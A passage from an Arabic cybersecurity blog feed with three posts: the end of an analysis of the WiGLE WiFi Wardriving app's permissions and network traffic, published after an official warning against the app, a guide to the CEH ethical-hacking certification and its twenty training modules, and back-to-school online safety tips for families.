&lt;p&gt;نهيب بجميع الأخوة المواطنين بمختلف شرائحهم وأماكن تواجدهم الوعي والتعامل بجدية مع هذا التحذير وعدم استخدام هذا التطبيق المحظور أو نشره تحت أي ظرف أو مبرر أو التعامل مع الأطراف المشغلة أو التي قد تستفيد من استخدام هذا التطبيق ضمن الشبكة السورية، وعدم الإنجرار خلف الأصوات التي تحاول التقليل من شأن التحذيرات الأمنية التي تطلقها الهيئة، وإن أمننا المعلوماتي هو مسؤولية جماعية تتحقق بتضافر كافة الجهود مهما صغرت، فإن لم تكن أنت الهدف قد تكون الوسيلة، وإن استخدام هذا التطبيق يعرضك للمساءلة القانونية كونه أداة للإضرار بالدولة ومنشآتها ومواطنيها.&lt;/p&gt;
&lt;h2 id=&quot;تحليل-سريع-للتطبيق&quot;&gt;تحليل سريع للتطبيق&lt;/h2&gt;
&lt;p&gt;في البداية لنتعرف على دلالة اسم التطبيق ومعنى كلمة Wardriving&lt;/p&gt;
&lt;h3 id=&quot;wardriving&quot;&gt;WarDriving&lt;/h3&gt;
&lt;p&gt;هي عملية استخدام أداة اكتشاف للبحث عن إشارات الشبكات اللاسلكية&lt;/p&gt;
&lt;p&gt;في كثير من الأحيان يشير هذا المصطلح إلى شخص يبحث عن شبكات لاسلكية غير مصرح له بالوصول إليها وتتم هذه العملية من خلال إجراء مسح للوسط الراديوي للموقع لأغراض ربما تكون ضارة أو على الأقل غير مصرح بها&lt;/p&gt;
&lt;p&gt;يمكن إجراء هذا الهجوم باستخدام أجهزة محمولة باليد أو بجهاز إلكتروني شخصي (PED – Personal Electronic Device) أو جهاز محمول مزود بإمكانيات Wi-Fi أو باستخدام جهاز حاسب محمول مزود بكرت شبكة لاسلكية له هوائي وهذا الأمر يمكن إجراؤه باستخدام الميزات الأصلية لنظام التشغيل أو باستخدام أدوات المسح للوسط الراديوي والكشف المتخصصة&lt;/p&gt;
&lt;p&gt;بمجرد اكتشاف وجود الشبكات اللاسلكية فإن الخطوة التالية هي تحديد ما إذا كانت الشبكة مفتوحة أم مغلقة، لا توجد قيود تقنية على الشبكة المفتوحة ويمكن للأجهزة الاتصال بها بالمقابل يوجد للشبكة المغلقة قيود تقنية لمنع الاتصالات غير المصرح بها و إذا كانت الشبكة مغلقة فقد يحاول المهاجم التخمين أو كسر التقنيات التي تمنع الاتصال&lt;/p&gt;
&lt;h2 id=&quot;صلاحيات-التطبيق&quot;&gt;صلاحيات التطبيق&lt;/h2&gt;
&lt;p&gt;يتطلب التطبيق صلاحيات للوصول لمكانك الجغرافي (آلية عمل التطبيق تحتاج لهذا الأمر) كما يتطلب التطبيق صلاحية الوصول إلى الصور والملفات (وهذا الأمر يمكن ان يعتبر سلوك خبيث)&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;طلبا صلاحيات تطبيق WiGLE WiFi Wardriving: الوصول إلى الموقع الجغرافي والوصول إلى الصور والملفات&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.12VgwS_Q_Z1gcy2x.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;يقوم التطبيق بتحديد معلومات الشبكات اللاسلكية المحيطة و معلومات أبراج الاتصالات التي يحصل الجهاز على الإشارة منها&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;شاشة تطبيق WiGLE WiFi تعرض الإحداثيات وقائمة الشبكات اللاسلكية وأبراج الاتصالات المرصودة مع قوة الإشارة ونوع التشفير&quot; width=&quot;1600&quot; height=&quot;920&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-03.D4I_SYJK_iarh1.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;يتصل التطبيق بسيرفر خارجي تابع لشركة غوغل (ممكن أن تكون الجهة المطورة للتطبيق تستخدم إحدى الخدمات السحابية أو التخزينية لشركة غوغل) ويتم إرسال المعلومات التي تم جمعها بشكل مشفر باستخدام البرتوكول HTTPS&lt;/p&gt;
&lt;p&gt;اتصالات التطبيق كما ظهرت في أداة مراقبة الشبكة:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;التطبيق&lt;/th&gt;
&lt;th&gt;البروتوكول والمنفذ&lt;/th&gt;
&lt;th&gt;الخادم&lt;/th&gt;
&lt;th&gt;الحالة&lt;/th&gt;
&lt;th&gt;الوقت&lt;/th&gt;
&lt;th&gt;الحجم&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;WiGLE WiFi Wardriving&lt;/td&gt;
&lt;td&gt;DNS, 53&lt;/td&gt;
&lt;td&gt;clients4.google.com&lt;/td&gt;
&lt;td&gt;Closed&lt;/td&gt;
&lt;td&gt;23:40:19&lt;/td&gt;
&lt;td&gt;418 B&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WiGLE WiFi Wardriving&lt;/td&gt;
&lt;td&gt;HTTPS, 443&lt;/td&gt;
&lt;td&gt;clients4.google.com&lt;/td&gt;
&lt;td&gt;Active&lt;/td&gt;
&lt;td&gt;23:40:54&lt;/td&gt;
&lt;td&gt;5.3 KB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WiGLE WiFi Wardriving&lt;/td&gt;
&lt;td&gt;HTTPS, 443&lt;/td&gt;
&lt;td&gt;clients4.google.com&lt;/td&gt;
&lt;td&gt;Active&lt;/td&gt;
&lt;td&gt;23:40:54&lt;/td&gt;
&lt;td&gt;5.3 KB&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;تفاصيل أحد هذه الاتصالات:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;الحقل&lt;/th&gt;
&lt;th&gt;القيمة&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;App&lt;/td&gt;
&lt;td&gt;WiGLE WiFi Wardriving (10135)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protocol&lt;/td&gt;
&lt;td&gt;HTTPS (TCP)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SNI&lt;/td&gt;
&lt;td&gt;clients4.google.com&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Destination&lt;/td&gt;
&lt;td&gt;216.58.211.206:443&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Status&lt;/td&gt;
&lt;td&gt;Active&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Traffic&lt;/td&gt;
&lt;td&gt;2.7 KB received — 2.6 KB sent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Packets&lt;/td&gt;
&lt;td&gt;8 received — 9 sent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Payload&lt;/td&gt;
&lt;td&gt;4.6 KB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Duration&lt;/td&gt;
&lt;td&gt;34 s&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;First seen&lt;/td&gt;
&lt;td&gt;09/09/22 23:40:19.395&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Last seen&lt;/td&gt;
&lt;td&gt;09/09/22 23:40:54.335&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;في هذا المقال قمنا بتحليل أولي سريع لهذا التطبيق، سنشارك معكم جزء ثاني يحوي على تحليل مفصل لعمل التطبيق والمعلومات التي يقوم بالوصول لها وإرسالها وخطورة هذا الأمر على المستوى الشخصي وعلى مستوى الأمن العام مع نصائح الحماية والتوعية الأمنية&lt;/p&gt;
</content:encoded><category>السلامة الرقمية</category><category>WiGLE WiFi</category><category>Wardriving</category><category>الشبكات اللاسلكية</category><category>صلاحيات التطبيقات</category><category>تحليل التطبيقات</category></item><item><title>شهادة الهاكر الأخلاقي CEH</title><link>https://blog.cyberpedia.site/ceh/</link><guid isPermaLink="true">https://blog.cyberpedia.site/ceh/</guid><description>دليل شهادة الهاكر الأخلاقي CEH: المراحل الخمس لاختبار الاختراق، ومحاور التدريب العشرون، والوظائف المتاحة بعدها، والمتطلبات اللازمة قبل البدء.</description><pubDate>Fri, 09 Sep 2022 09:01:28 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;شهادة CEH تدرّب متخصص أمن المعلومات على تكتيكات وتقنيات وإجراءات الهاكر الخبيث (TTP) لاكتشاف نقاط الضعف وإصلاحها. يتكون البرنامج من 20 محورًا نظريًا وعمليًا تغطي مراحل الاستطلاع والفحص والوصول والمحافظة عليه ومسح الآثار، ويفتح الباب لأكثر من 20 مسمى وظيفي، ويتطلب معرفة مسبقة بأساسيات أنظمة التشغيل والشبكات.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;الهاكر الأخلاقي هو متخصص في أمن المعلومات يتم تدريبه لتحديد نقاط الضعف في الشبكات والتخفيف من حدتها وتأثيرها وإجراء تقييمات للحماية و الأمان لمنع انتهاكات وخروقات وتسريبات البيانات&lt;/p&gt;
&lt;p&gt;الهاكر الأخلاقي هو مسار وظيفي واعد مع فرص نمو واسعة النطاق&lt;/p&gt;
&lt;p&gt;يحمل الهاكر الأخلاقي المعتمد ألقاب وظيفية مختلفة في مجال الأمن السيبراني، عمله الأساسي أمر بالغ الأهمية لاختبار حماية أصول الشركات وتأمينها&lt;/p&gt;
&lt;p&gt;يتم تدريب الهاكر الأخلاقي على نفس التكتيكات والتقنيات والإجراءات TTP – Tactics, Techniques, and Procedures التي يستخدمها الهاكر الخبيث / ذو القبعة السوداء لاختراق أنظمة المؤسسات من خلال عملية منهجية قابلة للتكرار للكشف عن نقاط الضعف وإصلاحها&lt;/p&gt;
&lt;h2 id=&quot;برنامج-تدريب-ceh&quot;&gt;برنامج تدريب CEH&lt;/h2&gt;
&lt;p&gt;ينقسم البرنامج التدريبي إلى 20 وحدة وتحوي كل وحدة على أساسيات نظرية عميقة بالإضافة لتطبيقات عملية واسعة النطاق تتيح لك ممارسة الأساليب والإجراءات على أنظمة وبيئات محاكاة ضمن سيناريوهات عملية حقيقية&lt;/p&gt;
&lt;p&gt;برنامج تدريب الهاكر الأخلاقي هو أكثر برامج الأمن السيبراني شمولاً والذي يوازن بين كل المحاور لإعداد مهندس حماية يتمتع بالمعرفة والمهارة وهذا الأمر ما يجعل هذه الشهادة فريدة من نوعها بالمقارنة مع المجالات الأخرى&lt;/p&gt;
&lt;h2 id=&quot;مراحل-عملية-اختبار-الاختراق-الهاكر-الأخلاقي&quot;&gt;مراحل عملية اختبار الاختراق (الهاكر الأخلاقي)&lt;/h2&gt;
&lt;p&gt;&lt;img alt=&quot;المراحل الخمس لاختبار الاختراق في منهج CEH: الاستطلاع، والفحص، والوصول للنظام، والمحافظة على الوصول، ومسح الآثار&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.-s_2A_5C_13xPeV.webp&quot;&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;معرفة المراحل الخمسة لعملية اختبار الاختراق (الهاكر الأخلاقي) هو أمر بالغ الأهمية لأي منظمة، كلما عرفت بشكل أكثر عما يرغب المهاجم بفعله كلما حصلت على خطوات استباقية للحماية بشكل أكبر&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;مرحلة الاستطلاع Reconnaissance&lt;/strong&gt;: أو (جمع المعلومات) وهي المرحلة الأولى لأي عملية اختبار اختراق والتي تهدف لجمع المعلومات عن الهدف قبل شن الهجوم&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;مرحلة الفحص Scanning:&lt;/strong&gt; تتم من خلال استخدام أدوات مختلفة لجمع المعلومات عن مواقع الويب و الشبكات وأنظمة التشغيل بهدف اكتشاف نقاط الضعف والثغرات&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;الوصول للنظام Gaining Access:&lt;/strong&gt; تشير إلى إمكانية المهاجم للوصول إلى النظام أو التطبيق أو الجهاز الموجود على الشبكة&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;المحافظة على الوصول Maintaining Access:&lt;/strong&gt; تشير إلى استمرارية الوصول إلى النظام حتى بعد إعادة تشغيل الجهاز أو القيام بعملية تسجيل الخروج&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;مسح أو تغطية الآثار Covering Tracks:&lt;/strong&gt; الهدف من هذه المرحلة هو حذف السجلات وإزالة أي أدوات أو أكواد برمجية أو تطبيقات تم تثبيتها أو استخدامها على النظام الهدف&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;كيف-تفيدك-هذه-الأمور&quot;&gt;كيف تفيدك هذه الأمور؟&lt;/h2&gt;
&lt;p&gt;فهم وتطبيق المراحل الخمسة لاختبار الاختراق يجعلك مستعد للبدء بالتفكير مثل المهاجم الحقيقي وهذا الأمر سيؤدي لعدم وقوعك أنت أو مؤسستك ضحية للهجمات&lt;/p&gt;
&lt;h2 id=&quot;ما-هي-محاور-التدريب&quot;&gt;ما هي محاور التدريب؟&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;يحوي منهاج الشهادة على 20 محور وهي:&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id=&quot;1--introduction-to-ethical-hacking&quot;&gt;1- Introduction to Ethical Hacking&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على الأمور الأساسية في عالم أمن المعلومات بما في ذلك اساسيات عملية اختبار الاختراق وضوابط أمن المعلومات والقوانين ذات الصلة والمعايير الأخرى&lt;/p&gt;
&lt;h3 id=&quot;2--footprinting-and-reconnaissance&quot;&gt;2- Footprinting and Reconnaissance&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على كيفية استخدام أحدث التقنيات والأدوات للقيام بعمليات الاستطلاع وجمع المعلومات وتعتبر هذه المرحلة هي الحاسمة لنجاح أي هجوم (كلما كانت المعلومات المجموعة أكثر كلما زادت فرص نجاح الهجوم بشكل أكبر)&lt;/p&gt;
&lt;h3 id=&quot;3--scanning-networks&quot;&gt;3- Scanning Networks&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على التقنيات المختلفة لفحص الشبكات واكتشاف المنافذ المفتوحة والإجراءات المضادة لهذه العمليات&lt;/p&gt;
&lt;h3 id=&quot;4--enumeration&quot;&gt;4- Enumeration&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على تقنيات التعداد والاكتشاف المختلفة والإجراءات المضادة المرتبطة بها&lt;/p&gt;
&lt;h3 id=&quot;5--vulnerability-analysis&quot;&gt;5- Vulnerability Analysis&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على طرق تحديد واكتشاف الثغرات الأمنية في البنية التحتية لشبكات الشركات وأجهزة العقد النهائية وتتضمن أنواع مختلفة من أدوات تقييم الضعف والثغرات&lt;/p&gt;
&lt;h3 id=&quot;6--system-hacking&quot;&gt;6- System Hacking&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على منهجيات اختراق النظام المختلفة والمستخدمة لاكتشاف نقاط الضعف والثغرات في الأنظمة والشبكات بما في ذلك إخفاء المعلومات ومسح الآثار&lt;/p&gt;
&lt;h3 id=&quot;7--malware-threats&quot;&gt;7- Malware Threats&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على الأنواع المختلفة للبرمجيات الخبيثة (حصان طروادة – الفيروسات – برامج الفدية …) مع تقنيات تحليل البرمجيات الخبيثة والإجراءات المضادة لها&lt;/p&gt;
&lt;h3 id=&quot;8--sniffing&quot;&gt;8- Sniffing&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على تقنيات إلتقاط حزم البيانات واستخدام هذه العملية لاكتشاف نقاط الضعف في الشبكات بالإضافة للإجراءات المضادة وطرق الحماية الاستباقية&lt;/p&gt;
&lt;h3 id=&quot;9--social-engineering&quot;&gt;9- Social Engineering&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على تقنيات الهندسة الاجتماعية بما في ذلك هجمات التصيد الاحتيالي وتدقيق الحماية على مستوى العنصر البشري والتوعية الأمنية والإجراءات المضادة&lt;/p&gt;
&lt;h3 id=&quot;10--denial-of-service&quot;&gt;10- Denial of Service&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على هجمات منع الخدمة DoS ومنع الخدمة الموزعة DDoS بالإضافة للأدوات المستخدمة لتدقيق الحماية الخاصة بهذا النوع من الهجمات وإجراءات الحماية&lt;/p&gt;
&lt;h3 id=&quot;11--session-hijacking&quot;&gt;11- Session Hijacking&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على التقنيات المختلفة لسرقة الجلسة واكتشاف الجلسات النشطة على مستوى الشبكة واكتشاف عمليات المصادقة والتفويض ونقاط الضعف في عمليات التشفير المرتبطة بها بالإضافة للإجراءات المضادة وطرق الحماية&lt;/p&gt;
&lt;h3 id=&quot;12--evading-ids-firewall-and-honeypots&quot;&gt;12- Evading IDS, Firewall, and Honeypots&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على أنظمة الحماية كالجدران النارية وأنظمة كشف الاختراق IDS وتقنيات تجاوز الحماية المطبقة والأدوات المستخدمة لتدقيق الحماية في محيط الشبكة بحثاً عن الثغرات ونقاط الضعف بالإضافة للإجراءات المضادة&lt;/p&gt;
&lt;h3 id=&quot;13--hacking-web-servers&quot;&gt;13- Hacking Web Servers&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على الهجمات الخاصة ضد سيرفرات الويب بما في ذلك منهجية الهجوم المستخدمة لتدقيق نقاط الضعف في البنى التحتية لسيرفرات الويب والإجراءات المضادة&lt;/p&gt;
&lt;h3 id=&quot;14--hacking-web-application&quot;&gt;14- Hacking Web Application&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على الهجمات الخاصة بتطبيقات الويب بما في ذلك المنهجية الخاصة باختبار اختراق تطبيقات الويب والمستخدمة لتدقيق نقاط الضعف والإجراءات المضادة&lt;/p&gt;
&lt;h3 id=&quot;15--sql-injection&quot;&gt;15- SQL Injection&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على هجمات حقن تعليمات قواعد البيانات وتقنيات تجاوز الفلترة والحماية المطبقة وطرق الحماية والإجراءات المضادة&lt;/p&gt;
&lt;h3 id=&quot;16--hacking-wireless-networks&quot;&gt;16- Hacking Wireless Networks&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على الأنواع المختلفة للتشفير والتهديدات الخاصة بالشبكات اللاسلكية والمنهجيات والأدوات المستخدمة في الهجمات مع أدوات التدقيق والحماية والإجراءات المضادة&lt;/p&gt;
&lt;h3 id=&quot;17--hacking-mobile-platforms&quot;&gt;17- Hacking Mobile Platforms&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على الهجمات الخاصة ضد أجهزة الموبايل التي تعمل بأنظمة Android or IOS وإرشادات وأدوات الحماية والأمان&lt;/p&gt;
&lt;h3 id=&quot;18--iot-hacking&quot;&gt;18- IoT Hacking&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على الأنواع المختلفة للهجمات الخاصة بأجهزة انترنت الأشياء IoT – Internet of Things ومنهجيات وأدوات الهجوم وطرق الحماية والإجراءات المضادة&lt;/p&gt;
&lt;h3 id=&quot;19--cloud-computing&quot;&gt;19- Cloud Computing&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على الحوسبة السحابية والتقنيات الخاصة بها بالإضافة للتهديدات المتنوعة والهجمات وتقنيات وأدوات الحماية الخاصة بها&lt;/p&gt;
&lt;h3 id=&quot;20--cryptography&quot;&gt;20- Cryptography&lt;/h3&gt;
&lt;p&gt;من خلال هذا المحور ستتعرف على خوارزميات التشفير المختلفة والبنية التحتية للمفتاح العام PKI والتشفير الخاص بالبريد الالكتروني والهجمات على تقنيات التشفير وأدوات التحليل المختلفة&lt;/p&gt;
&lt;h2 id=&quot;ما-هي-الوظائف-المتاحة-بعد-هذا-التدريب&quot;&gt;ما هي الوظائف المتاحة بعد هذا التدريب؟&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;اكتسابك للمهارات السابقة يفتح الباب لك لأكثر من 20 تسمية وظيفية مختلفة وهي:&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Mid-Level Information Security Auditor&lt;/li&gt;
&lt;li&gt;Cybersecurity Auditor&lt;/li&gt;
&lt;li&gt;Security Administrator&lt;/li&gt;
&lt;li&gt;IT Security Administrator&lt;/li&gt;
&lt;li&gt;Cyber Defense Analyst&lt;/li&gt;
&lt;li&gt;Vulnerability Assessment Analyst&lt;/li&gt;
&lt;li&gt;Warning Analyst&lt;/li&gt;
&lt;li&gt;Information Security Analyst 1&lt;/li&gt;
&lt;li&gt;Security Analyst L1&lt;/li&gt;
&lt;li&gt;Infosec Security Administrator&lt;/li&gt;
&lt;li&gt;Cybersecurity Analyst level 1, level 2, &amp;amp; level 3&lt;/li&gt;
&lt;li&gt;Network Security Engineer&lt;/li&gt;
&lt;li&gt;SOC Security Analyst&lt;/li&gt;
&lt;li&gt;Security Analyst&lt;/li&gt;
&lt;li&gt;Network Engineer&lt;/li&gt;
&lt;li&gt;Senior Security Consultant&lt;/li&gt;
&lt;li&gt;Information Security Manager&lt;/li&gt;
&lt;li&gt;Senior SOC Analyst&lt;/li&gt;
&lt;li&gt;Solution Architect&lt;/li&gt;
&lt;li&gt;Cybersecurity Consultant&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;كيف-أبدأ-التدريب&quot;&gt;كيف أبدأ التدريب؟&lt;/h2&gt;
&lt;p&gt;للدخول لهذه الدورة يجب أن تملك معرفة بأساسيات أنظمة التشغيل والشبكات، في حال كنت لا تملك هذه المهارات ننصحك بالبداية بدورة &lt;strong&gt;&lt;a href=&quot;https://cyberpedia.site/course/cyber-ops/&quot;&gt;Cyber Ops&lt;/a&gt;&lt;/strong&gt; والتي تعتبر أسرع وأقوى دورة للدخول لهذا المجال ومن خلالها ستتعرف على أساسيات شبكات الحاسب وأجهزة الشبكة وأجهزة وتقنيات الحماية وأساسيات الحماية والهجمات الرقمية وأنظمة التشغيل (كالي لينكس) وأساسيات التشفير والويب وقواعد البيانات&lt;/p&gt;
&lt;p&gt;إذا كنت تمتلك هذه المهارات بشكل مسبق يمكنك البدء من خلال “&lt;a href=&quot;https://cyberpedia.site/course/ceh1/&quot;&gt;دورة الهاكر الأخلاقي&lt;/a&gt;“&lt;/p&gt;
&lt;h2 id=&quot;للمزيد-من-المعلومات&quot;&gt;للمزيد من المعلومات&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://fb.me/jameeltawelh&quot;&gt;فيسبوك&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://t.me/cyber_fu&quot;&gt;قناة التلغرام&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://t.me/+LZBl_TaAdlM5YzI0&quot;&gt;مجموعة التلغرام&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://wa.me/+963991380524&quot;&gt;واتساب&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded><category>المسار المهني والشهادات</category><category>CEH</category><category>الهاكر الأخلاقي</category><category>شهادات الأمن السيبراني</category><category>اختبار الاختراق</category></item><item><title>العودة للمدارس ونصائح الأمن السيبراني</title><link>https://blog.cyberpedia.site/back-to-school-and-cybersecurity/</link><guid isPermaLink="true">https://blog.cyberpedia.site/back-to-school-and-cybersecurity/</guid><description>نصائح أمن سيبراني للعودة إلى المدارس: تجنّب خدع التسوق والتصيد، واستخدم كلمات مرور قوية، وحدّث الأجهزة، واحمِ كاميرا الويب، وعلّم أطفالك حماية بياناتهم.</description><pubDate>Sun, 04 Sep 2022 07:53:42 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;يستغل المحتالون موسم العودة إلى المدارس لاستهداف الآباء والطلاب والمعلمين بالحيل والتصيد. لحماية عائلتك: احذر رسائل الجوائز والقسائم المزيفة وتسوّق من مواقع موثوقة، واستخدم كلمات مرور قوية وفريدة، وحدّث الأنظمة وثبّت حل حماية يحمي كاميرا الويب، وراجع التطبيقات المدرسية قبل تنزيلها، وعلّم أطفالك ألا يشاركوا معلوماتهم مع الغرباء.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;بينما يستعد الأطفال من جميع الأعمار للعودة إلى الفصل الدراسي، يتوق الأوغاد الرقميون إلى الاستفادة من هذا الوقت المزدحم من خلال استهداف الآباء والطلاب والمعلمين بالحيل من جميع الأنواع&lt;/p&gt;
&lt;p&gt;نحن جميعاً أهداف للمهاجمين ولصوص الهوية الذين يهدفون إلى إلحاق الضرر بحياتنا الرقمية والمالية ويسعون لاختراق الأجهزة للوصول إلى شبكات المدارس&lt;/p&gt;
&lt;p&gt;يجب أن تكون حماية البيانات الشخصية لك ولأطفالك أولوية قصوى في هذا العام الدراسي، حيث يستمر النشاط الخبيث عبر الإنترنت في تهديد سلامة وخصوصية المستخدمين&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;سواء كانت عودة أطفالك بشكل فعلي إلى المدرسة أو كان خياركم متابعة التعلم عن بعد من المنزل، فمن المهم جداً التعرف على أفضل الممارسات عبر الإنترنت لضمان العودة الآمنة إلى المدرسة&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;دعنا نلقي نظرة على بعض النصائح الرئيسية للأمن السيبراني مع بدء الدراسة لهذا العام:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;احترس من عمليات الخداع التقليدية في التسوق وخاصة أثناء العودة إلى المدرسة ومحاولات التصيد الأخرى المتعلقة بالمدرسة و إذا كنت تشارك في بعض عمليات التسوق عبر الإنترنت في اللحظة الأخيرة لمستلزمات المدرسة فكن أكثر يقظة تجاه رسائل البريد الإلكتروني غير المرغوب فيها التي تدعي أنك ربحت أي سلع أو قسائم أو أجهزة ذكية خاصة بالعودة إلى المدرسة و استخدم فقط مواقع الويب الموثوقة للتسوق واستخدام VPN لحماية معلوماتك المالية من عمليات التطفل على الشبكة&lt;/li&gt;
&lt;li&gt;تدرب على استخدام كلمات السر القوية والآمنة وتأكد من أن أجهزتك وحساباتك المدرسية تم إعدادها باستخدام كلمات سر قوية وفريدة من نوعها، لتسهيل عملية إدارة كلمات السر يمكنك استخدام تطبيق مدير كلمات السر&lt;/li&gt;
&lt;li&gt;تأكد من أن الأجهزة الذكية الخاصة بك أنت وأطفالك محمية بكلمة سر وقم بتوجيه أطفالك إلى عدم ترك أجهزة الحاسب المحمولة والهواتف الذكية الخاصة بهم دون مراقبة أو بدون كلمة سر، يمكن للمحتالين وغيرهم من المهاجمين استغلال هذا الأمر والوصول إلى البيانات الحساسة&lt;/li&gt;
&lt;li&gt;حافظ على تحديث الأنظمة في جميع الأوقات وقم بتثبيت واستخدام أحد حلول الحماية الموثوقة على أجهزتك لضمان عدم تثبيت برامج ضارة عن غير قصد أو الوقوع ضحية لمواقع الويب الخاصة بعمليات التصيد الاحتيالي.&lt;/li&gt;
&lt;li&gt;قم بتثقيف الأطفال حول التواجد الإيجابي عبر الإنترنت وعدم الاستجابة للتهديدات أو التنمر عبر الإنترنت.&lt;/li&gt;
&lt;li&gt;في وقت المدرسة هناك المزيد من مؤتمرات الفيديو واستخدام كاميرا الويب، لذا تأكد من أن حلول الأمان والحماية الخاصة بك توفر حماية لكاميرا الويب و يجب أن يضمن ذلك عدم تمكن أي برامج خبيثة أو مهاجم معين من اختطاف الكاميرا لتصويرك أنت أو أطفالك، غالباً ما يؤدي تغطية العدسة إلى منع المتطفلين عبر الإنترنت من الرؤية ولكن هذا لا يعني أنهم لن يكونوا قادرين على التنصت&lt;/li&gt;
&lt;li&gt;ابحث عن أي تطبيقات متعلقة بالمدرسة قد ترغب أنت أو طفلك في تثبيتها على الجهاز واطلع على المراجعات وسياسة الخصوصية قبل التنزيل&lt;/li&gt;
&lt;li&gt;علم الأطفال أن يثمنوا بياناتهم الخاصة، في بعض الأحيان لا يفصلنا عن مشاركة المعلومات الشخصية مع الغرباء سوى نقرة واحدة وتأكد من عدم إعطاء أطفالك معلومات حساسة كعنوان المنزل أو رقم الهاتف لأي شخص غريب&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;إذا كنت بحاجة إلى مساعدة في حماية نفسك و جميع أفراد عائلتك في هذا الموسم الدراسي فننصحك بهذه الدورة السريعة &lt;a href=&quot;https://bookipedia.site/course/protection-guide/&quot;&gt;“دليل الحماية الشامل”&lt;/a&gt; والتي تحوي على 130 نصيحة لتساعدك أنت وأفراد عائلتك للبقاء على الجانب الآمن من شبكة الانترنت وهذا الأمر سيساعدك في توفير الحماية والمال والجهد عند التعامل مع التهديدات الإلكترونية&lt;/p&gt;
&lt;p&gt;سلامتك على الإنترنت هي هدفنا الأساسي لذا نرجو منك متابعتنا على &lt;a href=&quot;https://fb.me/jameeltawelh&quot;&gt;الفيسبوك&lt;/a&gt; لنساعدك في تعلم الأمور الأساسية في الأمن السيبراني بطريقة سهلة (للمستخدم العادي) بعيداً عن التعقيدات التقنية&lt;/p&gt;
